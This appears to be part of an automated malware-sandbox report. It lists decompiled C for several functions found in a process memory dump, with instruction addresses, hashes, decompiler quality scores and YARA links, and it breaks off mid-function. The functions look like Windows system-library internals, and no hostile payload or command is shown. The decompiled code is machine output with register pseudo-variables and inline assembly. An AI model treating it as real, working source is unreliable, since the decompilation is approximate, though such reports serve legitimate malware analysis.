0x04d2c1e4
0x04d2c1e4
0x04d2c1ec
0x04d72d7d
0x04d72d7d
0x04d2c1f3
0x04d2c1ff
0x04d72d88
0x04d72d8d
0x04d72d94
0x04d72d94
0x04d72d9f
0x04d72da4
0x04d72dab
0x04d72db0
0x04d72db2
0x04d72db3
0x04d72db4
0x04d72dbc
0x04d72dc3
0x04d72dc3
0x04d2c205
0x04d2c205
0x04d2c208
0x04d2c20e
0x04d2c211
0x04d2c216
0x04d2c219
0x04d2c21f
0x04d2c222
0x04d2c22c
0x04d2c234
0x04d2c23a
0x04d2c23f
0x04d2c245
0x04d2c24b
0x04d2c251
0x04d2c25a
0x04d2c276
0x04d2c27d
0x04d2c27d
0x04d2c25c
0x04d2c25c
0x00000000
0x04d2c25e
0x04d2c1a4
0x04d2c1aa
0x04d2c1b3
0x04d2c265
0x04d2c26c
0x04d2c26c
0x00000000

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: 3292ed72b37295239a81527db604da713f9063a9f9e589b7dafcf418baf5cd13
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: C5312171B01596BAE705EBB0C580BEDF7A4FF6220CF08815AD51C97201EB74BA09DBB1

Uniqueness

Uniqueness Score: -1.00%

Function 04D3E730, Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E04D3E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E04D49670() < 0) {
					L04D5DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x4df7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L04D24620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M04D3E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x04d3e730
0x04d3e736
0x04d3e738
0x04d3e73d
0x04d3e73e
0x04d3e740
0x04d3e749
0x04d3e765
0x04d3e76a
0x04d3e76b
0x04d3e76c
0x04d3e76d
0x04d3e76e
0x04d3e76f
0x04d3e775
0x04d3e777
0x04d3e77e
0x04d7b675
0x04d3e784
0x04d3e784
0x04d3e789
0x04d3e7a8
0x04d3e7ac
0x04d3e807
0x04d3e7ae
0x04d3e7ae
0x04d3e7b1
0x04d3e7b4
0x04d3e7b9
0x04d3e7c0
0x04d3e7c4
0x04d3e7ca
0x04d3e7cc
0x00000000
0x04d3e7d3
0x04d3e7d6
0x00000000
0x00000000
0x04d3e7ff
0x04d3e802
0x00000000
0x00000000
0x04d3e7f9
0x04d3e7fc
0x00000000
0x00000000
0x04d3e7f3
0x04d3e7f6
0x00000000
0x00000000
0x04d3e7ed
0x04d3e7f0
0x00000000
0x00000000
0x04d3e7e7
0x04d3e7ea
0x00000000
0x00000000
0x04d7b685
0x04d7b688
0x00000000
0x00000000
0x04d7b682
0x00000000
0x00000000
0x04d3e7cc
0x04d3e7d9
0x04d3e7dc
0x04d3e7de
0x04d3e7de
0x04d3e7ac
0x04d3e7e4
0x04d3e74b
0x04d3e751
0x04d3e759
0x04d3e761
0x04d3e761

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caedb1ca2b5436383595cc492dd97c84989efc68e3dcaa7d1c107508c32a28a3
Instruction ID: 431344b2dd8f466c88493d5080b898e6c97068b1fa11a57aa364be01d52cb2b7
Opcode Fuzzy Hash: caedb1ca2b5436383595cc492dd97c84989efc68e3dcaa7d1c107508c32a28a3
Instruction Fuzzy Hash: B9316DB5A14249EFD744CF68D841B9AB7E4FB59314F148296F904CB381E631FD80CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04D3BC2C, Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E04D3BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x4df6100; // 0x42
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E04D22280(0xd, 0x185cf1a0);
				_t41 =  *0x4df60f8; // 0x0
				if(_t41 != 0) {
					 *0x4df60f8 =  *_t41;
					 *0x4df60fc =  *0x4df60fc + 0xffff;
				}
				E04D1FFB0(_t41, 0x800, 0x185cf1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x4df60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L04D24620(0x4df6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x4df6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x04d3bc36
0x04d3bc42
0x04d3bc45
0x04d3bc4a
0x04d3bd35
0x00000000
0x00000000
0x00000000
0x00000000
0x04d3bc50
0x04d3bc50
0x04d3bc58
0x04d3bc5a
0x04d3bc60
0x00000000
0x00000000
0x04d7a4f2
0x04d7a4f6
0x00000000
0x00000000
0x00000000
0x04d7a4fc
0x04d3bc79
0x04d3bc7e
0x04d3bc86
0x04d3bd16
0x04d3bd20
0x04d3bd20
0x04d3bc8d
0x04d3bc94
0x04d3bcbd
0x04d3bcca
0x04d3bccb
0x04d3bccc
0x04d3bccd
0x04d3bcce
0x04d3bcd4
0x04d3bcea
0x04d3bcee
0x04d3bcf2
0x04d3bd00
0x04d3bd04
0x00000000
0x04d3bc96
0x04d3bcab
0x04d3bcaf
0x04d3bd2c
0x04d3bd2c
0x04d3bd09
0x00000000
0x04d3bd09
0x04d3bcb1
0x04d3bcb5
0x04d3bcbb
0x00000000
0x00000000
0x00000000
0x04d3bcbb

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a37e2dba58ec9fb947180ee239fd22cc40c9e34c54f8528297350d9eb8dc030
Instruction ID: f215a90f37e327b7ba2317c8dd2238d2702b2e43388fc3b90ef6a952fe82de6b
Opcode Fuzzy Hash: 0a37e2dba58ec9fb947180ee239fd22cc40c9e34c54f8528297350d9eb8dc030
Instruction Fuzzy Hash: FF31EE32A006559BDB21DF68E4807A673B4FF18316F15007AED49DB306EB79FD068B90

Uniqueness

Uniqueness Score: -1.00%

Function 04D09100, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E04D09100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x4ddf6e8);
				E04D5D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E04DD88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E04D5D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x4df86c0; // 0xc807b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x4df86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E04D22280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E04DD88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E04D4AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x4dfb1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x4df84c0;
										if(_t69 >=  *0x4df84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E04DD9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E04D0922A(_t82);
							_t53 = E04D27D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E04DD8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x4df86c0; // 0xc807b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x4df86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x4df86bc;
										_t72 = 0x4df86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E04D09240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x4df86c4;
									_t72 = 0x4df86c0;
									L18:
									E04D39B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x04d09100
0x04d09100
0x04d09100
0x04d09100
0x04d09102
0x04d09107
0x04d0910c
0x04d09110
0x04d09115
0x04d09136
0x04d09143
0x04d637e4
0x04d637e4
0x04d09149
0x04d0914e
0x04d0914e
0x04d09117
0x04d0911d
0x00000000
0x00000000
0x04d0911f
0x04d09125
0x00000000
0x04d09151
0x04d09158
0x04d0915d
0x04d09161
0x04d09168
0x04d63715
0x00000000
0x04d0916e
0x04d0916e
0x04d09175
0x04d09177
0x04d0917e
0x04d0917f
0x04d09182
0x04d09182
0x04d09187
0x04d09187
0x04d0918a
0x04d0918d
0x04d0918f
0x04d09192
0x04d09195
0x04d09198
0x04d09198
0x04d09198
0x04d0919a
0x00000000
0x00000000
0x04d6371f
0x04d63721
0x04d63727
0x04d6372f
0x04d63733
0x04d63735
0x04d63738
0x04d6373b
0x04d6373d
0x04d63740
0x00000000
0x00000000
0x04d63746
0x04d63749
0x00000000
0x00000000
0x04d6374f
0x04d63751
0x00000000
0x00000000
0x04d63757
0x04d63759
0x04d6375c
0x04d6375c
0x04d6375e
0x04d6375e
0x04d63761
0x04d63764
0x00000000
0x00000000
0x04d63766
0x04d63768
0x04d637a3
0x04d637a3
0x04d637a5
0x04d637a7
0x04d637ad
0x04d637b0
0x04d637b2
0x04d637bc
0x04d637c2
0x04d637c2
0x04d637b2
0x04d09187
0x04d09187
0x04d0918a
0x04d0918d
0x04d0918f
0x04d09192
0x04d09195
0x00000000
0x04d09195
0x00000000
0x04d09187
0x04d6376a
0x04d6376a
0x04d6376c
0x04d6376c
0x04d6376f
0x04d63775
0x00000000
0x00000000
0x04d63777
0x04d63779
0x00000000
0x00000000
0x04d63782
0x04d63787
0x04d63789
0x04d63790
0x04d63790
0x04d6378b
0x04d6378b
0x04d6378b
0x04d63792
0x04d63795
0x04d63795
0x04d63798
0x04d63798
0x04d6379b
0x04d6379b
0x04d091a3
0x04d091a9
0x04d091b0
0x04d091b4
0x04d091b4
0x04d091bb
0x04d091c0
0x04d091c5
0x04d091c7
0x04d637da
0x04d091cd
0x04d091cd
0x04d091cd
0x04d091d2
0x04d091d5
0x04d09239
0x04d09239
0x04d091d7
0x04d091db
0x04d091e1
0x04d091e7
0x04d091fd
0x04d09203
0x04d0921e
0x04d09223
0x00000000
0x04d09223
0x04d09205
0x04d09208
0x04d0920c
0x04d09214
0x04d09214
0x04d091e9
0x04d091e9
0x04d091ee
0x04d091f3
0x04d091f3
0x04d091f3
0x04d091e7
0x00000000
0x04d091db
0x04d09187
0x04d09168

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf765aded13f370ad2db3f8be4f31bf751dec5a979ddb9034d0237d59fcb6103
Instruction ID: 63fa848a7e64bdb1e946c2593ac3997703051f556a662057760b9e9e718f1079
Opcode Fuzzy Hash: bf765aded13f370ad2db3f8be4f31bf751dec5a979ddb9034d0237d59fcb6103
Instruction Fuzzy Hash: BD31B0B1B01644DFEB21EF68C4A8BACBBF1FB49354F18C199D41567282C374B980DB62

Uniqueness

Uniqueness Score: -1.00%

Function 04DD070D, Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E04DD070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E04DD07DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E04DCAFDE( &_v8,  &_v12);
					E04DD1293(_t38, _v28, _t60);
					if(E04D27D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E04DC14FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x04dd071b
0x04dd0724
0x04dd0734
0x04dd0738
0x04dd074b
0x04dd074b
0x04dd0753
0x04dd0753
0x04dd0759
0x04dd075d
0x04dd0774
0x04dd0779
0x04dd077d
0x04dd0789
0x04dd0795
0x04dd07a7
0x04dd0797
0x04dd07a0
0x04dd07a0
0x04dd07af
0x04dd07c4
0x04dd07cd
0x04dd07cd
0x04dd07af
0x04dd07dc

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: 7aa4bc7070385fc6a215a19ad4f188b075a3ae1c429e27fb0b32ffa346573b8a
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: 3821C236304204AFD716DF18C884B6ABBA5FBC4758F048569F9959F385D630E909CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04D09240, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E04D09240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x4ddf708);
				E04D5D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E04D495D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E04D495D0();
				_t33 =  *0x4df84c4; // 0x0
				L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x4df84c4; // 0x0
				L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x4df84c4; // 0x0
				E04D22280(L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x4df86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E04D495D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E04D495D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E04D09325();
					_t50 =  *0x4df84c4; // 0x0
					return E04D5D0D1(L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x04d09240
0x04d09242
0x04d09247
0x04d0924c
0x04d0924e
0x04d09255
0x04d09257
0x04d0925a
0x04d0925f
0x04d0925f
0x04d09266
0x04d09271
0x04d09276
0x04d09279
0x04d0927e
0x04d09295
0x04d0929a
0x04d092b1
0x04d092b6
0x04d092d7
0x04d092dc
0x04d092e0
0x04d092e6
0x04d092e8
0x04d092ee
0x04d09332
0x04d09333
0x04d09337
0x04d09338
0x04d0933a
0x04d0933a
0x04d0933d
0x04d09342
0x04d09342
0x04d09345
0x04d09349
0x04d0934e
0x04d09352
0x04d09357
0x04d092f4
0x04d092f4
0x04d092f6
0x04d092f9
0x04d09300
0x04d09306
0x04d09324
0x04d09324

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 475f5aa562678aba1d0ea37ae31cfb11229e74dd3b950648932ee37478be69f5
Instruction ID: bc85423b7b85832965d04d3d5ef7c39f4dd4f63f00920eff8d69f901463be5d1
Opcode Fuzzy Hash: 475f5aa562678aba1d0ea37ae31cfb11229e74dd3b950648932ee37478be69f5
Instruction Fuzzy Hash: 60211671241640DFD721EF28CA50B5AB7B9FF18708F1485A8E049876B2CB34F941DB65

Uniqueness

Uniqueness Score: -1.00%

Function 04D846A7, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E04D846A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L04D24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E04D4F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E04D3D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L04D277F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x04d846b7
0x04d846ba
0x04d846c5
0x04d846c8
0x04d846d0
0x04d846d4
0x04d846e6
0x04d846e9
0x04d846f4
0x04d846ff
0x04d84705
0x04d84706
0x04d8470c
0x04d84713
0x04d8471b
0x04d84723
0x04d84725
0x04d846d6
0x04d846d9
0x04d846db
0x04d846db
0x04d84732

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: 96ac13dd39b43711785944420f262e3a87ea85e6f9e7d81f1d2faabbb68871b6
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: 3211E572604208BBDB159F5CD9808BEB7B9EF95304F10806EF984C7350DA319D55D7A5

Uniqueness

Uniqueness Score: -1.00%

Function 04D09080, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E04D09080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x4df85ec;
				E04D22280(_t48, 0x4df85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E04D1FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x4df538c; // 0xc9c9a8
					if( *_t84 != 0x4df5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x4ddf6e8);
						E04D5D0E8(0x4df85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
